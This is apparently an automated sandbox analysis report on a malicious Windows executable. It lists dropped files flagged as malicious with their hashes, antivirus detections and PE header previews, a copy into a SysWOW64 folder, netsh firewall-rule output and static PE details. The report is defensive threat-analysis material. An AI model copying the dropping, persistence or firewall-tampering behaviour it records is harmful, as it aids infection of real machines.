                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):298496
                                                                              Entropy (8bit):5.314843046074087
                                                                              Encrypted:false
                                                                              SSDEEP:3072:XCIFybJzjLXqqsD7pXnoaeMw8PYeoVf2hTHc0eCPWrxpzbgqru:SmmznA7pXcMwcToVOhTRZuzbgwu
                                                                              MD5:F4C254B2556531003266AF2D9D74B625
                                                                              SHA1:6FC8A01CADA67BB4D72C8414CF32FF26D42400D2
                                                                              SHA-256:3DBD6C9F0A3AE1CE1665D72C5404CE9170F1951E02DF3844FA035DCAC966F565
                                                                              SHA-512:45F841C0E3ABA878813E9DE5B8FD0AEB1085F4109F13A6CE2B8F26B03CCEBB9ADD232BCE30F8FAB41E980B78239FB7A8E8BEF46E98A0AF68F2D94E2421012583
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....I.`.....................................0....@.................................`........................................]..P....@..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...X....p...l...T..............@....rsrc...P....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):537088
                                                                              Entropy (8bit):5.840438491186833
                                                                              Encrypted:false
                                                                              SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                              MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                              SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                              SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                              SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                              C:\Users\user\AppData\Local\Temp\76E7.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):312320
                                                                              Entropy (8bit):5.47796974367935
                                                                              Encrypted:false
                                                                              SSDEEP:3072:apFm1bzbdCCqtGJsD7Aga8nrsPgKrGB4Ip6OD3jBaTN1Wrxpzbgqru:apkVdCxr70NPgKrGiM6KEN1uzbgwu
                                                                              MD5:2AE79DF2C51EF858F5483314B6B83FA0
                                                                              SHA1:F7EFA3757E0156C4C999AB4B36F829E664D91A89
                                                                              SHA-256:BC0735065E4789CD3974E454135AC106E5C5129385BC6B938EE7C852238B0000
                                                                              SHA-512:CF2B6144397CE27D1E87A9AED039EF3437F925718D8F6DF2B19AA8614117E0C43F8519B18FFB56A98A7E8B1B770B916F0FA0485DF97135D35DAC4743411A0224
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L......_.....................&...............0....@..........................P.......R.......................................]..P.......P............................1...............................P..@............0...............................text...#........................... ..`.rdata..R7...0...8..................@..@.data...x....p.......T..............@....rsrc...P...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\7CCD.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):301056
                                                                              Entropy (8bit):5.192330972647351
                                                                              Encrypted:false
                                                                              SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                              MD5:277680BD3182EB0940BC356FF4712BEF
                                                                              SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                              SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                              SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\E6AF.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):590848
                                                                              Entropy (8bit):6.732963553617895
                                                                              Encrypted:false
                                                                              SSDEEP:12288:wZ74qPWaSeXqN5GCJzSilgqJg38oOBPBLunnb:ygfG0ztlg938N0b
                                                                              MD5:27F38096E53A91C525B0700700CEE4C4
                                                                              SHA1:C9D8B68A4E0216A83C44D7208C2D79DA873A48A2
                                                                              SHA-256:A35A1FF0E7EF9F9DFFBDE98157E8FDF0AD0D2C1B081284ACB5CF29623AC79A4F
                                                                              SHA-512:64F26739100990230D01F787048EADD14B6DD424C09C815DB737D71CEE3D89D18ACD4F91DCAF0694592D296AA2387A065E41380A71AD4CCAF841C785112E7587
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^`.....D...D...D.ScD3..D.SrD...D.SdDf..D=.D...D...D...D.SmD...D.SsD...D.SvD...DRich...D........PE..L...l_.`......................{...................@..........................P|................................................<....P{..............................................................|..@............................................text............................... ..`.rdata.............................@..@.data.....s..........~..............@....rsrc........P{.....................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\FF1A.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):861696
                                                                              Entropy (8bit):7.3318876861748015
                                                                              Encrypted:false
                                                                              SSDEEP:12288:37Ea6v+VoHuIMykls8cGSV/PGK2fSHciRsmBd8VNKkoOezMLgUunnX:t6v+Aqpls8BSVepjUs5NW1HX
                                                                              MD5:C80F38DA2951D491B7EDF24F89235293
                                                                              SHA1:CA1FB05B49651033705CD8F565B745334F6FA1CB
                                                                              SHA-256:D206AC0995D218519A794CBED6686790CE51E0152EB4251EC17A68941CCB26D8
                                                                              SHA-512:576ADECE03EB615C7D0196FAF385437B6B4C37AE6CD7F043C16B331E985B72598F93ABB8B54E8800CAFB75ABB1152D8B907B1DBC5D275FA7D37ACED575F1A443
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L...{..`.............................-.......0....@.................................dC.......................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data........p.......b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe
                                                                              Process:C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):13640704
                                                                              Entropy (8bit):6.337419254660324
                                                                              Encrypted:false
                                                                              SSDEEP:24576:2znMVsmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmH:2zA
                                                                              MD5:EAE6D58C8C1CB389453AF3692BF58DA8
                                                                              SHA1:6DEDF0B5CC3DFF0D02350995269C4374073C1465
                                                                              SHA-256:BBBA69A086C733CFF603C78D51AA0ACA281EB390FB83A2F24B1A3CAF88622ECA
                                                                              SHA-512:91D3D989E997BEB5F0FD2845940E40C0657B596E60B88CD41520FA36B9E8749BF9371AB061AD51A6E8AA9750BFA850659FBE2894FA51B37756D1D9EDFE80381A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....I.`.....................................0....@.................................`........................................]..P....@..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...X....p...l...T..............@....rsrc...P....@...d..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Roaming\adiicvb
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):284672
                                                                              Entropy (8bit):5.038426150867094
                                                                              Encrypted:false
                                                                              SSDEEP:3072:WuIvZ9KEbLnAALxvRs7uCoorI90O3manWxULkIFueWrxpzbgqru:WrPKOnvA7uIrUJY0kIFueuzbgwu
                                                                              MD5:D609A21245D77DCCD6D4A659CBD9466A
                                                                              SHA1:A8775CCB1D6B7B941E5B37D59DB5D25F4B736CF9
                                                                              SHA-256:A0F70F88C9A376E7C0F7E508C796BF1DBBF58FF8B172B9AFF3421BE63E2D7F78
                                                                              SHA-512:771E118945BC4C544312C67E568D0D9BAB8138573D31CB3F4E81626978EB77FA472EB49E84F67E79DA15E45F5C90B8A1BC2EAD9BAFD8B9FCF7B7455F4917D47D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....qy`.....................................0....@.................................&........................................]..P.......`............................1...............................P..@............0...............................text...#........................... ..`.rdata...7...0...8..................@..@.data....~...p.......T..............@....rsrc...`............r..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Roaming\adiicvb:Zone.Identifier
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                              C:\Users\user\AppData\Roaming\vsiicvb
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):301056
                                                                              Entropy (8bit):5.192330972647351
                                                                              Encrypted:false
                                                                              SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                              MD5:277680BD3182EB0940BC356FF4712BEF
                                                                              SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                              SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                              SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Roaming\vtwerfe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):248375
                                                                              Entropy (8bit):7.999175516196176
                                                                              Encrypted:true
                                                                              SSDEEP:3072:wvDw9/bms3KtQdGJe9QVB7aCCOQcqhLvly486c6kqL++7gIVPl+qTNoF6hvAkh:wLO/6eKCIoO8rcocIaIZMqKF6Ckh
                                                                              MD5:70CAB22CF4C8CA48B404DF25A1EA56FA
                                                                              SHA1:8EF410D86B82AE06997F46FC1C5150C000682F88
                                                                              SHA-256:B891BF63EAA05163E8C22102F25BFB165A8D6861CB25405D1833F59D3922ABE9
                                                                              SHA-512:B4DD40CF612A208D13A26AE2A1BD8FAA8569E2A3FDAFEF712FF8A7B033AACDCC3790EB32F160B49608BCA378473A56288FE2E0C7399B743810D950FA600AFD24
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: x.)..x(5..q..g.V.[.-.......V&.....|.7..I.......2.#...=....:......g....~.D..T,@r&j....%.... v.`T\..S7..&.u*....#..,c4.Y.W...5...V.C..A.6...<..l.S..d7V.~.1.U `rl2.......g....Y.Y.L..J..|8..88.B..A.......EZ3..?...4.....zB...|.I.{.x..............~[.e@.Qi@D..........&..}.%aR.!....\E .Jp#w..Yl&..j..9ji..v.1F."]..(....u..^..e....;...-..0X]Z...c..w.b....e.k.Q!j...Lx.b;h.$.'.7.w.W.+..3.#....s.y..Q......Gl...aLW^..A... .,.E?.7v..y.5&..6y......c....ay.......c.V.;/......."Y.<.|.F...8...?pn....d.....2.j)IN.... ?\....V.....yl. .H.....48B.O.a1....O..5..=f.\.F.Vk..Z.B.t8ZO..U.S....R..&..ke.9%p]b.|..........A..c./........k.2.+.8k.....d(..l.CZ..4.-.2.u.......k..k....'.....?^.2P..u."3.....z.v..O...0...>C....#"(+.MS..+..t......[...@ii.0.2....D$@.8.....Csh...M.S^.jnlF.f+)8./+...X..q.;)m.4..L1Z.d..C...;E.i.......m.s.2..0.-.....Pd.M.....dF3.C8.D.Mp=...&..KH7Z.d..H..i.......{.....=.!7R..g*.....z).;....../.Z...O.h........d..}..7._..?......~.l.f!/....H~9........
                                                                              C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe (copy)
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):13640704
                                                                              Entropy (8bit):6.337419254660324
                                                                              Encrypted:false
                                                                              SSDEEP:24576:2znMVsmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmH:2zA
                                                                              MD5:EAE6D58C8C1CB389453AF3692BF58DA8
                                                                              SHA1:6DEDF0B5CC3DFF0D02350995269C4374073C1465
                                                                              SHA-256:BBBA69A086C733CFF603C78D51AA0ACA281EB390FB83A2F24B1A3CAF88622ECA
                                                                              SHA-512:91D3D989E997BEB5F0FD2845940E40C0657B596E60B88CD41520FA36B9E8749BF9371AB061AD51A6E8AA9750BFA850659FBE2894FA51B37756D1D9EDFE80381A
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....I.`.....................................0....@.................................`........................................]..P....@..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...X....p...l...T..............@....rsrc...P....@...d..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              \Device\ConDrv
                                                                              Process:C:\Windows\SysWOW64\netsh.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3773
                                                                              Entropy (8bit):4.7109073551842435
                                                                              Encrypted:false
                                                                              SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                              MD5:DA3247A302D70819F10BCEEBAF400503
                                                                              SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                              SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                              SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):5.038426150867094
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:V91yW08J6p.exe
                                                                              File size:284672
                                                                              MD5:d609a21245d77dccd6d4a659cbd9466a
                                                                              SHA1:a8775ccb1d6b7b941e5b37d59db5d25f4b736cf9
                                                                              SHA256:a0f70f88c9a376e7c0f7e508c796bf1dbbf58ff8b172b9aff3421be63e2d7f78
                                                                              SHA512:771e118945bc4c544312c67e568d0d9bab8138573d31cb3f4e81626978eb77fa472eb49e84f67e79da15e45f5c90b8a1bc2ead9bafd8b9fcf7b7455f4917d47d
                                                                              SSDEEP:3072:WuIvZ9KEbLnAALxvRs7uCoorI90O3manWxULkIFueWrxpzbgqru:WrPKOnvA7uIrUJY0kIFueuzbgwu
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....qy`...........

                                                                              File Icon

                                                                              Icon Hash:acfc36b6b694c6e2

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x402ed7
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x60797181 [Fri Apr 16 11:14:09 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:6aeb06b4ccc41eb437631c770949cf13

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007FC204F50E6Fh
                                                                              jmp 00007FC204F4B42Dh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              test ecx, 00000003h
                                                                              je 00007FC204F4B5D6h
                                                                              mov al, byte ptr [ecx]
                                                                              add ecx, 01h
                                                                              test al, al
                                                                              je 00007FC204F4B600h
                                                                              test ecx, 00000003h
                                                                              jne 00007FC204F4B5A1h
                                                                              add eax, 00000000h
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              mov eax, dword ptr [ecx]
                                                                              mov edx, 7EFEFEFFh
                                                                              add edx, eax
                                                                              xor eax, FFFFFFFFh
                                                                              xor eax, edx
                                                                              add ecx, 04h
                                                                              test eax, 81010100h
                                                                              je 00007FC204F4B59Ah
                                                                              mov eax, dword ptr [ecx-04h]
                                                                              test al, al
                                                                              je 00007FC204F4B5E4h
                                                                              test ah, ah
                                                                              je 00007FC204F4B5D6h
                                                                              test eax, 00FF0000h
                                                                              je 00007FC204F4B5C5h
                                                                              test eax, FF000000h
                                                                              je 00007FC204F4B5B4h
                                                                              jmp 00007FC204F4B57Fh
                                                                              lea eax, dword ptr [ecx-01h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-02h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-03h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-04h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              mov edi, edi
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              sub esp, 20h
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              push esi
                                                                              push edi
                                                                              push 00000008h
                                                                              pop ecx
                                                                              mov esi, 004132F8h
                                                                              lea edi, dword ptr [ebp-20h]
                                                                              rep movsd
                                                                              mov dword ptr [ebp-08h], eax
                                                                              mov eax, dword ptr [ebp+0Ch]
                                                                              pop edi
                                                                              mov dword ptr [ebp-04h], eax

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 build 21022
                                                                              • [LNK] VS2008 build 21022
                                                                              • [ASM] VS2008 build 21022
                                                                              • [IMP] VS2005 build 50727
                                                                              • [RES] VS2008 build 21022
                                                                              • [C++] VS2008 build 21022

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x15de80x50.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f0000xe560.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x131f00x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x150c80x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x130000x1a8.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x116230x11800False0.6068359375data6.65145087011IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x130000x378c0x3800False0.369280133929SysEx File -5.19241956234IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x170000x27ef80x21e00False0.249409017528data2.76625519301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x3f0000xe5600xe600False0.621858016304data6.14631752789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_CURSOR0x4b1200x130dataSpanishArgentina
                                                                              RT_CURSOR0x4b2680xea8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"SpanishArgentina
                                                                              RT_CURSOR0x4c1100x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"SpanishArgentina
                                                                              RT_ICON0x3f6000xea8dataSpanishArgentina
                                                                              RT_ICON0x404a80x8a8dataSpanishArgentina
                                                                              RT_ICON0x40d500x6c8dataSpanishArgentina
                                                                              RT_ICON0x414180x568GLS_BINARY_LSB_FIRSTSpanishArgentina
                                                                              RT_ICON0x419800x25a8dataSpanishArgentina
                                                                              RT_ICON0x43f280x10a8dataSpanishArgentina
                                                                              RT_ICON0x44fd00x988dataSpanishArgentina
                                                                              RT_ICON0x459580x468GLS_BINARY_LSB_FIRSTSpanishArgentina
                                                                              RT_ICON0x45e380xea8dataSpanishArgentina
                                                                              RT_ICON0x46ce00x8a8dataSpanishArgentina
                                                                              RT_ICON0x475880x25a8dBase III DBT, version number 0, next free block index 40SpanishArgentina
                                                                              RT_ICON0x49b300x10a8dataSpanishArgentina
                                                                              RT_ICON0x4abd80x468GLS_BINARY_LSB_FIRSTSpanishArgentina
                                                                              RT_DIALOG0x4cb980x9cdataSpanishArgentina
                                                                              RT_STRING0x4cc380x45adataSpanishArgentina
                                                                              RT_STRING0x4d0980x1ecdataSpanishArgentina
                                                                              RT_STRING0x4d2880x2d4dataSpanishArgentina
                                                                              RT_ACCELERATOR0x4b0900x68dataSpanishArgentina
                                                                              RT_ACCELERATOR0x4b0f80x28dataSpanishArgentina
                                                                              RT_GROUP_CURSOR0x4b2500x14dataSpanishArgentina
                                                                              RT_GROUP_CURSOR0x4c9b80x22dataSpanishArgentina
                                                                              RT_GROUP_ICON0x45dc00x76dataSpanishArgentina
                                                                              RT_GROUP_ICON0x4b0400x4cdataSpanishArgentina
                                                                              RT_VERSION0x4c9e00x1b8COM executable for DOSSpanishArgentina

                                                                              Imports

                                                                              DLLImport
